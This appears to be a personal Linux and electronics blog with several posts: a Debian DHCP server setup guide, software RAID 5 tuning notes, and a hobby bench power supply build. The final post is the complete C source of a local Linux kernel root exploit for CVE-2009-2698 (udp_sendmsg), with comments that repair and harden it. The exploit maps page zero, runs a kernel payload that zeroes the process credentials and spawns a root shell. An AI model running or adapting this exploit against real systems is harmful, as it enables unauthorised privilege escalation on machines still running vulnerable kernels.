I assume you have the following configuration on your host:

2 NICs:
eth0 (for the internal LAN)
eth1 (for the internet)

1. Setting up your eth0 for dhcp use

The most important thing you need to do is to configure a static IP address on the internal interface.

I will use 192.168.10.x as my IP address range.

We type the following command: nano /etc/network/interfaces

And be sure the settings are the same as below:

auto eth0
iface eth0 inet static
address 192.168.10.1
netmask 255.255.255.0
network 192.168.10.0
broadcast 192.168.10.255

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

restart the network interface type:


/etc/init.d/networking restart

And press enter.

2. Install and configure the dhcp server

If you have completed the step above we are going to install the dhcp and configure it.

First lets install the module:

apt-get install dhcp3-server

After a while it shows a blue screen with a warning. Just press Enter and let it install.

When it has finished installing, the server will not start yet. We need to bind it to an interface and give it an IP range to lease.

2.1 Binding the interface

Enter the following command

nano /etc/default/dhcp3-server

Press enter

Edit the following line

INTERFACES=""
To
INTERFACES="eth0"

(eth0 is the internal interface given 192.168.10.1 above, and the 192.168.10.0/24 subnet declared in the next step lives there. The original text said eth1, but that is the internet-facing interface: dhcpd would then answer DHCP requests from the upstream network, and since no subnet is declared for eth1's address it will most likely refuse to serve on it at all.)

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

2.2 Configuring the DHCP lease range

We are at the final step and after that we have a full DHCP Server Running!

We are not going to use the default config file of the dhcp server however we are going to keep a copy of the config file.

go to the following directory:

cd /etc/dhcp3/

Make a backup copy of the following config file by typing the following command:

cp dhcpd.conf dhcpd.old.conf

And press Enter.

Now remove the file that you have backuped

rm dhcpd.conf

We make the new dhcpd.conf in this step as I promised type:

nano dhcpd.conf

Now  copy/paste the following data into the file

subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.10 192.168.10.100;
option domain-name-servers 192.168.1.1;
option domain-name "Failserver.nl";
option netbios-name-servers 192.168.10.1;
option routers 192.168.10.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.10.255;
default-lease-time 86400;
max-lease-time 676800;
}

After you have modified the file press control+x you will get a confirmation telling you to save the file yes or no.. We do Y and press Enter

Now restart the DHCP3 server

/etc/init.d/dhcp3-server restart

Mar 04

Here I am going to talk about Linux software RAID. If yours is very slow, you can test it the way I did; I hope it helps.
I had an ASUS P6T motherboard with an Intel ICH10R RAID controller, 3x 1 TB SATA 2 HDDs and an Intel Core i7 920 processor, and I wanted to install Fedora 10 on that machine.
After configuring RAID 5 in the BIOS I booted the Fedora 10 installation DVD to start the installation. BUT! Suddenly I saw that Anaconda saw 3 separate hard drives instead of 1 RAID device. After some googling I figured out that my motherboard does not have a real RAID controller; instead it is a fakeraid controller, i.e. software RAID whose software lives in the BIOS. So I decided to use Linux software RAID, because it is definitely better than the one from ASUS.
So I installed Fedora 10 with Linux software RAID 5 and LUKS encryption. After the installation the machine worked very slowly. I thought it was because of the encryption, but after some googling I understood that the encryption cannot slow the machine down that much. The real reason was that a newly created RAID 5 array has to build the parity onto the third drive, which takes a long time -- approximately 4 hours on 1 TB drives in my case. You can check the rebuild status at any time with one of the following commands:

# cat /proc/mdstat

or

# mdadm --detail /dev/md0

After the rebuild was over and after some tuning, I had ~90 MB/s write and ~200 MB/s read.

The tuning parameters were:

echo 32768 > /sys/block/md0/md/stripe_cache_size
blockdev --setra 65536 /dev/md0
Feb 27

I've always had an interest in electronics and recently I've been exploring my interests more. Last week I sorted through my tub of parts and placed them in individual drawers. It took a good while to sort everything but I think it was worth it. I've seen bench power supplies built from PC power supplies before, so I thought I'd build one myself. Thing is, I never really got around to it.

Yesterday I was feeling rather ambitious and decided to make a bench top power supply for small electronics. All the sites I found I have lost, so I kind of made it up as I went along. Most of them used ATX power supplies that are readily available, but I opted for the easy way out and used an AT with a hard on/off switch. At first this was the only reason I used it, but there are more advantages to using a AT over an ATX power supply for an external power supply. Firstly, it was cheap, well free actually. I took it from a PC that I had modified some time ago. I have a box full of AT power supplies in storage that I’ll get to some time and replace it. But I won’t be using the PC it came out of for a while, mostly because I have toaster ovens that are faster. Another reason it is better than a ATX is it has less voltages. The only voltages listed are 12v, 5v, -5v (7v) and GND. They vary in amps but are sufficient for what I will be using it for. It made it easy not to screw it up since there wasn’t many wires.

To make it was really easy. I took the top off. Drilled 4 holes in the case and inserted the insulated terminal, checking to make sure they didn’t ground out on the case. Cut most of the cables, leaving a couple of molex’s hanging out just in case I need them. I then soldered the remaining wires to a terminal by voltage (Yellow +12, Red +5, Red +/-5, Black GND.) It might not be the prettiest of them all, but I think it will do its job well.

Sep 02

/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) – CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c – linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root) Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* andi@void.at
* http://www.void.at
*
************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
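/*
 * Kernel-mode payload.  The kernel calls this through the forged
 * dst_entry.output pointer planted by main() (via NF_HOOK), so it runs on
 * the current task's kernel stack.
 *
 * It locates thread_info at the 8 KiB-aligned base of that stack
 * (esp & 0xffffe000), loads current = thread_info->task from its first
 * word, and stores 0 over the run of uid/gid fields at task_struct+0x150..
 * 0x16b.  The offsets are for the 32-bit Debian Etch 2.6.18-4-686 kernel
 * this was tested on; they differ on any other build.
 *
 * NOTE(review): the stores at 0x15a and 0x16a overlap the preceding 4-byte
 * stores and leave bytes 0x15e-0x15f / 0x16e-0x16f untouched; 0x15c and
 * 0x16c look like what was intended.  Kept as in the original, which is
 * reported working (the untouched high halves are already 0 for ids below
 * 65536), but confirm against the target's task_struct before relying on it.
 *
 * The only change from the listing is restoring the "0x" prefixes in the
 * asm strings: the page showed them as "0×" (a multiplication sign), which
 * the assembler rejects.
 */
void set_current_task_uids_gids_to_zero(void) {
   asm("push %eax\n"
       "movl $0xffffe000, %eax\n"
       "andl %esp, %eax\n"
       "movl (%eax), %eax\n"
       "movl $0x0, 0x150(%eax)\n"
       "movl $0x0, 0x154(%eax)\n"
       "movl $0x0, 0x158(%eax)\n"
       "movl $0x0, 0x15a(%eax)\n"
       "movl $0x0, 0x160(%eax)\n"
       "movl $0x0, 0x164(%eax)\n"
       "movl $0x0, 0x168(%eax)\n"
       "movl $0x0, 0x16a(%eax)\n"
       "pop  %eax\n");
}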

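/*
 * Entry point.
 *
 * Maps a page at virtual address 0 to stand in for the NULL struct rtable
 * that the vulnerable udp_sendmsg() path hands to ip_append_data(), plants
 * the address of set_current_task_uids_gids_to_zero() where dst_entry.output
 * lives in it (offset 0x74 in the 32-bit 2.6.18 layout reproduced below),
 * drives the bug with two sendmsg() calls, and spawns a shell.
 *
 * Returns 0 after the shell exits.  Exits -1 if the socket or the mapping
 * cannot be created, or if the uids were not zeroed by the payload.
 *
 * Changes from the original: the anonymous mapping passes fd -1 instead of
 * 0 (stdin); the garbled "0×" hex prefixes are restored; the callback is
 * stored through a pointer-sized slot instead of an int cast; and the shell
 * is only spawned once getuid() confirms the escalation, instead of handing
 * the user an unprivileged shell on failure.
 */
int main(int argc, char **argv) {
   int s;
   struct msghdr header;
   struct sockaddr_in sin;
   char *rtable = NULL;

   (void)argc;
   (void)argv;

   fprintf(stderr,
           "hoagie_udp_sendmsg.c – linux root <= 2.6.19 local\n"
                  "-andi / void.at\n\n");

   s = socket(PF_INET, SOCK_DGRAM, 0);
   if (s == -1) {
      fprintf(stderr, "[*] can’t create socket\n");
      exit(-1);
   }

   /*
    * Any routable destination will do; loopback port 22 is used so that
    * the route lookup succeeds without touching the network.
    */
   memset(&header, 0, sizeof(struct msghdr));
   memset(&sin, 0, sizeof(struct sockaddr_in));
   sin.sin_family = AF_INET;
   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
   sin.sin_port = htons(22);
   header.msg_name = &sin;
   header.msg_namelen = sizeof(sin);

   /*
    * The trick: (*output)(struct sk_buff *) of the dst_entry embedded at
    * offset 0 of struct rtable is used as a callback (offset 0x74), so a
    * buffer is mapped at address 0 and that slot is pointed at our code.
    *
    * struct dst_entry
    * {
    *         struct dst_entry        *next;
    *         atomic_t                __refcnt;       client references
    *         int                     __use;
    *         struct dst_entry        *child;
    *         struct net_device       *dev;
    *         short                   error;
    *         short                   obsolete;
    *         int                     flags;
    * #define DST_HOST                1
    * #define DST_NOXFRM              2
    * #define DST_NOPOLICY            4
    * #define DST_NOHASH              8
    * #define DST_BALANCED            0x10
    *         unsigned long           lastuse;
    *         unsigned long           expires;
    *
    *         unsigned short          header_len;     * more space at head required *
    *         unsigned short          trailer_len;    * space to reserve at tail *
    *
    *         u32                     metrics[RTAX_MAX];
    *         struct dst_entry        *path;
    *
    *         unsigned long           rate_last;      * rate limiting for ICMP *
    *         unsigned long           rate_tokens;
    *
    *         struct neighbour        *neighbour;
    *         struct hh_cache         *hh;
    *         struct xfrm_state       *xfrm;
    *
    *         int                     (*input)(struct sk_buff*);
    *         int                     (*output)(struct sk_buff*);   <- 0x74
    *
    * #ifdef CONFIG_NET_CLS_ROUTE
    *         __u32                   tclassid;
    * #endif
    *
    *         struct  dst_ops         *ops;
    *         struct rcu_head         rcu_head;
    *
    *         char                    info[0];
    * };
    *
    * struct rtable
    * {
    *         union
    *         {
    *                 struct dst_entry        dst;
    *                 struct rtable           *rt_next;
    *         } u;
    *
    *         struct in_device        *idev;
    *
    *         unsigned                rt_flags;
    *         __u16                   rt_type;
    *         __u16                   rt_multipath_alg;
    *
    *         __be32                  rt_dst; * Path destination     *
    *         __be32                  rt_src; * Path source          *
    *         int                     rt_iif;
    *
    *         * Info on neighbour *
    *         __be32                  rt_gateway;
    *
    *         * Cache lookup keys *
    *         struct flowi            fl;
    *
    *         * Miscellaneous cached information *
    *          __be32                  rt_spec_dst; * RFC1122 specific destination *
    *         struct inet_peer        *peer; * long-living peer info *
    * };
    */

   /*
    * MAP_FIXED at address 0 only succeeds when the kernel lets an
    * unprivileged process map page zero (where vm.mmap_min_addr exists it
    * must permit this).  fd is -1: MAP_ANONYMOUS ignores it on Linux, but
    * passing 0 (stdin), as the original did, was merely accidental.
    */
   rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                 MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
   if (rtable == MAP_FAILED) {
      fprintf(stderr, "[*] mmap failed\n");
      exit(-1);
   }
   /* dst_entry.output: a 4-byte function pointer on the 32-bit target. */
   *(void **)(rtable + 0x74) = (void *)set_current_task_uids_gids_to_zero;

   /*
    * Trigger.  The second sendmsg() reaches ip_append_data() with rt == NULL
    * because udp_sendmsg() short-circuits on a pending (corked) frame:
    *
    * if (up->pending) {
    *          *
    *          * There are pending frames.
    *          * The socket lock must be held while it's corked.
    *          *
    *          lock_sock(sk);
    *          if (likely(up->pending)) {
    *                    if (unlikely(up->pending != AF_INET)) {
    *                            release_sock(sk);
    *                            return -EINVAL;
    *                    }
    *                    goto do_append_data;
    *            }
    *            release_sock(sk);
    *    }
    *
    * NOTE(review): the return values are deliberately left unchecked, as
    * in the original.  The first call's job is to leave the socket corked;
    * whether it reports an error on the vulnerable kernel is not
    * established here, so do not add a check that aborts on failure.
    */
   sendmsg(s, &header, MSG_MORE|MSG_PROXY);
   sendmsg(s, &header, 0);

   close(s);

   /* Only hand out a shell if the payload actually ran. */
   if (getuid() != 0) {
      fprintf(stderr, "[*] uid is still %u, exploit failed\n", (unsigned)getuid());
      exit(-1);
   }

   system("/bin/sh");

   return 0;
}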
